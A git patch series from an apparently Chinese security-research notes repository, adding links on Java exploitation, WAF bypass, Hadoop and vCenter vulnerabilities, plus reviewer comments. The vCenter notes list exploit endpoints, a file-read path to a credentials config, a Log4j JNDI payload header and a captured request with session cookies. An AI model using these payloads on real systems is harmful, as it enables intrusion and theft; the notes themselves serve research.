@@ -179,3 +179,4 @@ + 2022/10/15 [bcel环境下打入springboot内存马](https://mp.weixin.qq.com/s?__biz=MzU5MTExMjYwMA==&mid=2247485492&idx=1&sn=82fd393c7fc33417bff5d8cfa81b1451&chksm=fe32b8c3c94531d520d3fe4b0349b982fab83da2f6273799b68aa48f7bbb16700a642034c15e&mpshare=1&scene=23&srcid=1014Db7SCSD03rrslhpasxqf&sharer_sharetime=1665743334925&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **解决方法太麻烦,可以直接写一个loader里面加载代码。就不需要通过bcel加载了。(因为使用bcel加载的时候会存在class not find,因为加载器是bcel.)** + 2022/10/15 [Padding Oracle原理深度解析&CBC字节翻转攻击原理解析](https://mp.weixin.qq.com/s/OtGw-rALwpBkERfvqdZ4kQ?utm_source=qq&utm_medium=social&utm_oi=1165421494795706368) + 2022/10/16 [Shiro Padding Oracle攻击分析](https://www.cnblogs.com/wh4am1/p/12761959.html) **重新学习** ++ 2022/10/16 [JSP文件无依赖加载shellcode分析](https://cangqingzhe.github.io/2021/10/21/JSP%E6%96%87%E4%BB%B6%E6%97%A0%E4%BE%9D%E8%B5%96%E5%8A%A0%E8%BD%BDshellcode%E5%88%86%E6%9E%90/) **由于这种方式是通过Tomcat服务的进程上线的,exit的话比较困难** From 20024f762022224471ecffd354624da5a4388f78 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 17 Oct 2022 11:16:23 +0800 Subject: [PATCH 078/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 39d0e80..074b9c9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -180,3 +180,4 @@ + 2022/10/15 [Padding Oracle原理深度解析&CBC字节翻转攻击原理解析](https://mp.weixin.qq.com/s/OtGw-rALwpBkERfvqdZ4kQ?utm_source=qq&utm_medium=social&utm_oi=1165421494795706368) + 2022/10/16 [Shiro Padding Oracle攻击分析](https://www.cnblogs.com/wh4am1/p/12761959.html) **重新学习** + 2022/10/16 [JSP文件无依赖加载shellcode分析](https://cangqingzhe.github.io/2021/10/21/JSP%E6%96%87%E4%BB%B6%E6%97%A0%E4%BE%9D%E8%B5%96%E5%8A%A0%E8%BD%BDshellcode%E5%88%86%E6%9E%90/) **由于这种方式是通过Tomcat服务的进程上线的,exit的话比较困难** ++ 2022/10/17 [负载均衡踩坑记](https://cangqingzhe.github.io/2021/09/24/%E8%B4%9F%E8%BD%BD%E5%9D%87%E8%A1%A1%E8%B8%A9%E5%9D%91%E8%AE%B0/) From 2abd8cb5c6a37f7c80f5dad4e7ab771793ae6074 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 17 Oct 2022 12:31:25 +0800 Subject: [PATCH 079/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 074b9c9..21508c7 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -181,3 +181,4 @@ + 2022/10/16 [Shiro Padding Oracle攻击分析](https://www.cnblogs.com/wh4am1/p/12761959.html) **重新学习** + 2022/10/16 [JSP文件无依赖加载shellcode分析](https://cangqingzhe.github.io/2021/10/21/JSP%E6%96%87%E4%BB%B6%E6%97%A0%E4%BE%9D%E8%B5%96%E5%8A%A0%E8%BD%BDshellcode%E5%88%86%E6%9E%90/) **由于这种方式是通过Tomcat服务的进程上线的,exit的话比较困难** + 2022/10/17 [负载均衡踩坑记](https://cangqingzhe.github.io/2021/09/24/%E8%B4%9F%E8%BD%BD%E5%9D%87%E8%A1%A1%E8%B8%A9%E5%9D%91%E8%AE%B0/) ++ 2022/10/17 [最新CS RCE(CVE-2022-39197)复现心得分享](https://mp.weixin.qq.com/s/89wXyPaSn3TYn4pmVdr-Mw) From b483a9f6d46bdb6f357d7f9cf9b1020650a2e69a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 17 Oct 2022 22:56:42 +0800 Subject: [PATCH 080/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 21508c7..c4dd358 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -182,3 +182,4 @@ + 2022/10/16 [JSP文件无依赖加载shellcode分析](https://cangqingzhe.github.io/2021/10/21/JSP%E6%96%87%E4%BB%B6%E6%97%A0%E4%BE%9D%E8%B5%96%E5%8A%A0%E8%BD%BDshellcode%E5%88%86%E6%9E%90/) **由于这种方式是通过Tomcat服务的进程上线的,exit的话比较困难** + 2022/10/17 [负载均衡踩坑记](https://cangqingzhe.github.io/2021/09/24/%E8%B4%9F%E8%BD%BD%E5%9D%87%E8%A1%A1%E8%B8%A9%E5%9D%91%E8%AE%B0/) + 2022/10/17 [最新CS RCE(CVE-2022-39197)复现心得分享](https://mp.weixin.qq.com/s/89wXyPaSn3TYn4pmVdr-Mw) ++ 2022/10/17 [RMI攻击Registry的两种方式](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651199558&idx=2&sn=f92be210fda6dcda351912e5819191e5&chksm=bd1d8acd8a6a03db3b62ba72b2a3b931ab99cf74dbacde501c0d615a8eb894c50d96405b3b43&mpshare=1&scene=23&srcid=10175X0cCc5JMI6fbq1VPYi6&sharer_sharetime=1666017207856&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From dbcc50a340f6532597a77a1ceb166baf99483320 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 19 Oct 2022 00:01:36 +0800 Subject: [PATCH 081/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index c4dd358..26584c0 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -183,3 +183,4 @@ + 2022/10/17 [负载均衡踩坑记](https://cangqingzhe.github.io/2021/09/24/%E8%B4%9F%E8%BD%BD%E5%9D%87%E8%A1%A1%E8%B8%A9%E5%9D%91%E8%AE%B0/) + 2022/10/17 [最新CS RCE(CVE-2022-39197)复现心得分享](https://mp.weixin.qq.com/s/89wXyPaSn3TYn4pmVdr-Mw) + 2022/10/17 [RMI攻击Registry的两种方式](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651199558&idx=2&sn=f92be210fda6dcda351912e5819191e5&chksm=bd1d8acd8a6a03db3b62ba72b2a3b931ab99cf74dbacde501c0d615a8eb894c50d96405b3b43&mpshare=1&scene=23&srcid=10175X0cCc5JMI6fbq1VPYi6&sharer_sharetime=1666017207856&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/10/19 [Apache Spark UI 命令注入漏洞 CVE-2022-33891](https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MjM5MTYxNjQxOA==&action=getalbum&album_id=2619537533131227139&scene=173&from_msgid=2652892336&from_itemidx=1&count=3&nolastread=1#wechat_redirect) From 614fade87eda619c49519b38ca8a18ef3fc09fc7 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 19 Oct 2022 08:37:53 +0800 Subject: [PATCH 082/257] Update README.md --- tomcat/README.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/tomcat/README.md b/tomcat/README.md index 1747bb3..c38371f 100644 --- a/tomcat/README.md +++ b/tomcat/README.md @@ -3,3 +3,6 @@ Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持,最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现,Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 规范。因为Tomcat 技术先进、性能稳定,而且免费,因而深受Java 爱好者的喜爱并得到了部分软件开发商的认可,成为目前比较流行的Web 应用服务器Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。对于一个初学者来说,可以这样认为,当在一台机器上配置好Apache 服务器,可利用它响应HTML(标准通用标记语言下的一个应用)页面的访问请求。实际上Tomcat是Apache 服务器的扩展,但运行时它是独立运行的,所以当你运行tomcat 时,它实际上作为一个与Apache 独立的进程单独运行的 ![](./img/1.png) + + +[复现tomcat远程代码执行漏洞CVE-2016-8735](https://gv7.me/articles/2018/CVE-2016-8735/) From 65e60bdac9b270aec98bf27d298747e5368350cc Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 20 Oct 2022 23:23:11 +0800 Subject: [PATCH 083/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 26584c0..514c97a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -184,3 +184,4 @@ + 2022/10/17 [最新CS RCE(CVE-2022-39197)复现心得分享](https://mp.weixin.qq.com/s/89wXyPaSn3TYn4pmVdr-Mw) + 2022/10/17 [RMI攻击Registry的两种方式](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651199558&idx=2&sn=f92be210fda6dcda351912e5819191e5&chksm=bd1d8acd8a6a03db3b62ba72b2a3b931ab99cf74dbacde501c0d615a8eb894c50d96405b3b43&mpshare=1&scene=23&srcid=10175X0cCc5JMI6fbq1VPYi6&sharer_sharetime=1666017207856&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/10/19 [Apache Spark UI 命令注入漏洞 CVE-2022-33891](https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MjM5MTYxNjQxOA==&action=getalbum&album_id=2619537533131227139&scene=173&from_msgid=2652892336&from_itemidx=1&count=3&nolastread=1#wechat_redirect) ++ 2022/10/20 [如何更加精确的检测Tomcat AJP文件包含漏洞(CVE-2020-1938)](https://gv7.me/articles/2020/how-to-detect-tomcat-ajp-lfi-more-accurately/) **ajp的利用** From 5dfacecf58e66efb2be368053025c1f04571aad4 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 22 Oct 2022 00:22:39 +0800 Subject: [PATCH 084/257] Update Readme.md --- "java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" index 0bc0205..7944b15 100644 --- "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" +++ "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" 
@@ -26,3 +26,4 @@ https://www.sec-in.com/author/8 这个师傅太猛了 + 2022/01/31 [验证是否存在写文件漏洞小技巧](https://mp.weixin.qq.com/s?__biz=MzkyMDIxMjE5MA==&mid=2247483994&idx=1&sn=2d29f31afa27a3709b5dc9e46532230a&chksm=c19705ebf6e08cfdd6dc59937beee4a77110b3cac9958335a6cfdbd020d00f2f24a7033063f2&mpshare=1&scene=23&srcid=0131EzMk9fpayyNZeXFR8nhb&sharer_sharetime=1643561054742&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) + 2022/02/26 [记一次曲折的weblogic上传webshell](https://chaserw.github.io/2021/11/05/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%9B%B2%E6%8A%98%E7%9A%84weblogic%E4%B8%8A%E4%BC%A0webshell/) + 2022/10/08 [实战 | 一次成功的子域名劫持](https://mp.weixin.qq.com/s/xA6OVbeQrCgeYBWMtkvWVA) **学习** ++ 2022/10/22 [上传包可“绕过”Java过滤器的检查?](https://gv7.me/articles/2019/why-can-multipart-post-bypass-java-filter/) **遇到了post请求有waf可以试一试文件上传的方法传递参数** From 3f0005fc0f5ab54ba4ea243fef3d9bf10b003b37 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 22 Oct 2022 00:23:46 +0800 Subject: [PATCH 085/257] Update Readme.md --- "java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" index 7944b15..63f06c2 100644 --- "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" +++ "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" 
@@ -27,3 +27,4 @@ https://www.sec-in.com/author/8 这个师傅太猛了 + 2022/02/26 [记一次曲折的weblogic上传webshell](https://chaserw.github.io/2021/11/05/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%9B%B2%E6%8A%98%E7%9A%84weblogic%E4%B8%8A%E4%BC%A0webshell/) + 2022/10/08 [实战 | 一次成功的子域名劫持](https://mp.weixin.qq.com/s/xA6OVbeQrCgeYBWMtkvWVA) **学习** + 2022/10/22 [上传包可“绕过”Java过滤器的检查?](https://gv7.me/articles/2019/why-can-multipart-post-bypass-java-filter/) **遇到了post请求有waf可以试一试文件上传的方法传递参数** ++ 2022/10/22 [burpsuite保存现有数据包记录&导入之前的抓包记录](https://blog.csdn.net/Fly_hps/article/details/88854111) [148处XSS你如何提交给开发修复?](https://gv7.me/articles/2017/how-do-to-submit-148-xss-vulnerabilities/) **bp的保存数据** From 1a286e4e90f9fe6176a7431c5c88fe7f4836b434 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 22 Oct 2022 16:02:35 +0800 Subject: [PATCH 086/257] Add files via upload --- .../chunked-coding-converter.md" | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 "java\346\227\245\345\270\270/chunked-coding-converter.md" diff --git "a/java\346\227\245\345\270\270/chunked-coding-converter.md" "b/java\346\227\245\345\270\270/chunked-coding-converter.md" new file mode 100644 index 0000000..4cd529f --- /dev/null +++ "b/java\346\227\245\345\270\270/chunked-coding-converter.md" @@ -0,0 +1,20 @@ +# chunked-coding-converter + +[唯快不破的分块传输绕WAF](https://mp.weixin.qq.com/s/pM1ULCqNdQwSB7hcltrbtw) + +[Bypass WAF HTTP协议覆盖+分块传输组合绕过](https://mp.weixin.qq.com/s/2DDYyvsZ5HIQC0qGMK9znQ) + +[利用分块传输吊打所有WAF](https://mp.weixin.qq.com/s/eDiiiVX4oF0LYG3Ia5P4mw) + +[技术讨论 | 在HTTP协议层面绕过WAF](https://www.freebuf.com/news/193659.html) + +[编写Burp分块传输插件绕WAF](https://gv7.me/articles/2019/chunked-coding-converter/) + +[Java反序列化数据绕WAF之延时分块传输](https://gv7.me/articles/2021/java-deserialized-data-bypasses-waf-through-sleep-chunked/) + +``` +只有HTTP/1.1支持分块传输 +POST包都支持分块,不局限仅仅于反序列化和上传包 +Transfer-Encoding: chunked大小写不敏感 +``` + 
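Review bot: in the new chunked-coding-converter.md, the three closing notes are prose but sit in an untagged code fence, and the last one, `Transfer-Encoding: chunked大小写不敏感`, does not say whether the header name, the `chunked` token, or both are matched case-insensitively. Suggest turning the block into a bullet list, stating which part of the header is meant, and noting which of the six linked articles each claim comes from, so that someone writing WAF normalisation rules can check it. The links also lack the date and one-line annotation that the entries in java日常/Readme.md carry.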
From ecc2b96cb605d519cbccd1e98b501572154224bb Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 24 Oct 2022 11:35:43 +0800 Subject: [PATCH 087/257] Create Readme.md --- hadoop/Readme.md | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 hadoop/Readme.md diff --git a/hadoop/Readme.md b/hadoop/Readme.md new file mode 100644 index 0000000..7e168b6 --- /dev/null +++ b/hadoop/Readme.md @@ -0,0 +1,21 @@ +# Hadoop + +[【安全风险通告】Apache Hadoop Yarn RPC未授权访问漏洞安全风险通告](https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247495027&idx=1&sn=5758a6717309a55e09f184e5bae82c75&chksm=fe79c9ebc90e40fd6d0c3f0bd21ce92f53b4f58aa0ee07d0c005ca85a28d2cfd70f61c40fae7&mpshare=1&scene=23&srcid=1123jW67UF5RY5e5aOeDZ5ha&sharer_sharetime=1637638003307&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) + +[Hadoop Yarn RPC RCE 复现](https://mp.weixin.qq.com/s/lVl5HnVuZyLTIeSrbw1cuA) + +[Hadoop Yarn RPC未授权RCE(含一键利用工具)](https://mp.weixin.qq.com/s?__biz=MzkwNDI1NDUwMQ==&mid=2247485150&idx=1&sn=c31937fdb3e92ae3951a98b7967032b2&chksm=c0888394f7ff0a8224a8984f2cb4935f9aa1e7d243c4b512c488600d8fef0b6ec16a2b345865&token=616099468&lang=zh_CN#rd) + +[Hadoop Yarn RPC未授权访问漏洞复现](https://zgao.top/hadoop-yarn-rpc%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/) + +[GHSL-2022-012: Arbitrary file write during TAR extraction in Apache Hadoop - CVE-2022-26612](https://securitylab.github.com/advisories/GHSL-2022-012_Apache_Hadoop/) + +## 环境搭建 + +org.apache.hadoop.yarn.util.resource.ResourceUtils + +``` +docker pull kpli0rn/hadoop-rpc-vuln:3.3.0 +docker run -d --name yarn -p 8042:8042 -p 8032:8032 kpli0rn/hadoop-rpc-vuln:3.3.0 +``` + From 537940ec5569abeb556ed3e1d398602f5f513971 Mon Sep 17 00:00:00 2001 
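Review bot: in hadoop/Readme.md, the `docker run` line under 环境搭建 publishes both ports on every host interface (`-p 8042:8042 -p 8032:8032`), and the image name marks it as deliberately vulnerable, so the lab service is reachable from whatever network the host is on. Suggest binding to loopback instead, for example `-p 127.0.0.1:8032:8032`, and saying so in the text. The bare line `org.apache.hadoop.yarn.util.resource.ResourceUtils` above the fence needs a sentence explaining what it refers to, and the first link could drop its `mpshare`, `sharer_sharetime` and `sharer_shareid` share-tracking parameters.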
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 24 Oct 2022 15:36:02 +0800 Subject: [PATCH 088/257] Create Readme.md --- VMware vCenter/Readme.md | 92 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 92 insertions(+) create mode 100644 VMware vCenter/Readme.md diff --git a/VMware vCenter/Readme.md b/VMware vCenter/Readme.md new file mode 100644 index 0000000..f8ff54d --- /dev/null +++ b/VMware vCenter/Readme.md 
@@ -0,0 +1,92 @@ +# vcenter + +### 版本查看 + +``` +/sdk/vimServiceVersions.xml +``` + +### CVE-2021-21972 + +[VMware vCenter RCE 漏洞踩坑实录——一个简单的RCE漏洞到底能挖出什么知识](https://mp.weixin.qq.com/s/eamNsLY0uKHXtUw_fiUYxQ) + +[CVE-2021-21972 vCenter Server 文件写入漏洞分析](https://blog.noah.360.net/vcenter-6-5-7-0-rce-lou-dong-fen-xi/) + +``` +VMware vCenter Server 7.0系列 < 7.0.U1c +VMware vCenter Server 6.7系列 < 6.7.U3l +VMware vCenter Server 6.5系列 < 6.5 U3n +VMware ESXi 7.0系列 < ESXi70U1c-17325551 +VMware ESXi 6.7系列 < ESXi670-202102401-SG +VMware ESXi 6.5系列 < ESXi650-202102101-SG +``` + +endpoint + +``` +/ui/vropspluginui/rest/services/uploadova +``` + +### CVE-2021-21985 + +[CVE-2021-21985 VMware vCenter Server远程代码执行漏洞分析](https://www.ghtwf01.cn/2022/07/31/CVE-2021-21985%20VMware%20vCenter%20Server%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/) + +``` +VMware vCenter Server 7.0系列 < 7.0.U2b +VMware vCenter Server 6.7系列 < 6.7.U3n +VMware vCenter Server 6.5系列 < 6.5 U3p +VMware Cloud Foundation 4.x 系列 < 4.2.1 +VMware Cloud Foundation 4.x 系列 < 3.10.2.1 +``` + +### CVE-2021-22005 + +[vCenter RCE 详细分析过程 (CVE-2021–22005)](https://cloud.tencent.com/developer/article/1887641) + +``` +VMware vCenter Server 7.0 +VMware vCenter Server 6.7 Running On Virtual Appliance +VMware Cloud Foundation (vCenter Server) 4.x +VMware Cloud Foundation (vCenter Server) 3.x +``` + +### Log4j + +endpoint + +``` +/websso/SAML2/SSO/vsphere.local?SAMLRequest= + +X-Forwarded-For: ${jndi:ldap://exp} +``` + + + +### CVE-2022-31680 + +[CVE-2022-31680](https://talosintelligence.com/vulnerability_reports/TALOS-2022-1587) + +``` +GET /psc/data/constraint/amJzMXszAAAAATMAAAACAAAIRW1wbG95ZWUAASL6C7Hsp5eXAAKXEjO-44rgaCk1FZKH_mF7AQQAAAADAAAGTWFyY2luAAB6aQ HTTP/1.1 +Host: 192.168.0.109 +Cookie: JSESSIONID=D8E403940B6B595FF53158ED63671A69; XSRF-TOKEN=b28efbac-6d3c-4fcb-b177-baee9c1e005e; VSPHERE-USERNAME=Administrator%40VSPHERE.LOCAL; 
VSPHERE-CLIENT-SESSION-INDEX=_87577cc1f7ac5bba20fe8d947d9ffcfe +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0 +Accept: application/json, text/plain, */* +Accept-Language: pl,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +Pragma: no-cache +Isangularrequest: true +X-Xsrf-Token: b28efbac-6d3c-4fcb-b177-baee9c1e005e +Referer: https://192.168.0.109/psc/ +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin +Te: trailers +Connection: close +``` + +### 后续利用 + +[VMware vCenter漏洞实战利用总结](https://mp.weixin.qq.com/s/0gg5TDEtL3lCb9pOnm42gg) + +[Vcenter实战利用方式总结](https://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==&mid=2247499057&idx=1&sn=24ce83c75152529f2b8ef8543162a734&chksm=cfa55922f8d2d0349b97211fdf45df6c78b26ace580b68579817ed67760aaface17348529cf3&mpshare=1&scene=23&srcid=10245pAGxEFHmXFGCMoKjGdB&sharer_sharetime=1666572610152&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 38258217a9f8a82cb920cd2651f1555c15e71add Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 24 Oct 2022 17:03:42 +0800 Subject: [PATCH 089/257] Update Readme.md --- VMware vCenter/Readme.md | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/VMware vCenter/Readme.md b/VMware vCenter/Readme.md index f8ff54d..a4ff167 100644 --- a/VMware vCenter/Readme.md +++ b/VMware vCenter/Readme.md @@ -6,6 +6,15 @@ /sdk/vimServiceVersions.xml ``` +### VMware vCenter Server 任意文件读取漏洞 + +[VMware vCenter Server 任意文件读取漏洞](https://forum.90sec.com/t/topic/1582) + +endpoint +``` +/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties +``` + ### CVE-2021-21972 [VMware vCenter RCE 漏洞踩坑实录——一个简单的RCE漏洞到底能挖出什么知识](https://mp.weixin.qq.com/s/eamNsLY0uKHXtUw_fiUYxQ) From 5ea6357b701e922c155ffb8ade88fcfe2e395876 Mon Sep 17 00:00:00 2001 
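Review bot: in VMware vCenter/Readme.md, the CVE-2021-21985 version list ends with two `VMware Cloud Foundation 4.x 系列` rows, and the second gives `< 3.10.2.1`, which cannot be a bound for the 4.x line; it looks like a copy of the row above and should read 3.x. The CVE-2022-31680 request block also commits a full `Cookie` header (`JSESSIONID`, `XSRF-TOKEN`, `VSPHERE-CLIENT-SESSION-INDEX`) and an `X-Xsrf-Token` value; replacing these with placeholders keeps the sample readable without storing session material. The file-read section added in the follow-up commit lists an endpoint but no affected versions, unlike the CVE sections below it.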
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 25 Oct 2022 09:35:12 +0800 Subject: [PATCH 090/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 514c97a..1549567 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -185,3 +185,4 @@ + 2022/10/17 [RMI攻击Registry的两种方式](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651199558&idx=2&sn=f92be210fda6dcda351912e5819191e5&chksm=bd1d8acd8a6a03db3b62ba72b2a3b931ab99cf74dbacde501c0d615a8eb894c50d96405b3b43&mpshare=1&scene=23&srcid=10175X0cCc5JMI6fbq1VPYi6&sharer_sharetime=1666017207856&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/10/19 [Apache Spark UI 命令注入漏洞 CVE-2022-33891](https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MjM5MTYxNjQxOA==&action=getalbum&album_id=2619537533131227139&scene=173&from_msgid=2652892336&from_itemidx=1&count=3&nolastread=1#wechat_redirect) + 2022/10/20 [如何更加精确的检测Tomcat AJP文件包含漏洞(CVE-2020-1938)](https://gv7.me/articles/2020/how-to-detect-tomcat-ajp-lfi-more-accurately/) **ajp的利用** ++ 2022/10/25 [Python PIP自解压的命令执行](https://mp.weixin.qq.com/s/xFY6VYzrA4RryH1agC8zUw) **包管理工具的命令执行** [node npm 中的preinstall 命令执行](https://bytedance.feishu.cn/docx/doxcnWmtkIItrGokckfo1puBtCh) From d39959ef08ef3f46dda521dad048bf4e5909dc5a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 25 Oct 2022 20:46:21 +0800 Subject: [PATCH 091/257] Update README.md --- Solr/README.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/Solr/README.md b/Solr/README.md index 38c86b8..cc7d06c 100644 --- a/Solr/README.md +++ b/Solr/README.md @@ -186,3 +186,6 @@ get = requests.get(burp0_url, headers=burp0_headers) print(get.text) ``` +## 任意文件删除 + +https://mp.weixin.qq.com/s/JXBiQR3q7ykITVFBwm_9Vg 
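Review bot: in Solr/README.md, the new `## 任意文件删除` section contains only a bare `mp.weixin.qq.com` URL, with no link title, no CVE or advisory id and no affected Solr versions, so the entry cannot be matched against a deployment and loses all meaning if the article is taken down. Suggest a titled Markdown link in the style used elsewhere in the repository, plus one line stating the affected versions and the fix.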
From 8b8e829bf050464a8b36ddf26841bed72dbb84aa Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 26 Oct 2022 11:39:18 +0800 Subject: [PATCH 092/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 1549567..ff2b853 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -186,3 +186,4 @@ + 2022/10/19 [Apache Spark UI 命令注入漏洞 CVE-2022-33891](https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MjM5MTYxNjQxOA==&action=getalbum&album_id=2619537533131227139&scene=173&from_msgid=2652892336&from_itemidx=1&count=3&nolastread=1#wechat_redirect) + 2022/10/20 [如何更加精确的检测Tomcat AJP文件包含漏洞(CVE-2020-1938)](https://gv7.me/articles/2020/how-to-detect-tomcat-ajp-lfi-more-accurately/) **ajp的利用** + 2022/10/25 [Python PIP自解压的命令执行](https://mp.weixin.qq.com/s/xFY6VYzrA4RryH1agC8zUw) **包管理工具的命令执行** [node npm 中的preinstall 命令执行](https://bytedance.feishu.cn/docx/doxcnWmtkIItrGokckfo1puBtCh) ++ 2022/10/26 [这是我见过最复杂的URL了](https://cn-sec.com/archives/1372213.html) From 730d0c4ceadeb1cc92845254303c16c3dba8c317 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 26 Oct 2022 21:44:06 +0800 Subject: [PATCH 093/257] Create Readme.md --- apache storm/Readme.md | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 apache storm/Readme.md diff --git a/apache storm/Readme.md b/apache storm/Readme.md new file mode 100644 index 0000000..c269064 --- /dev/null +++ b/apache storm/Readme.md 
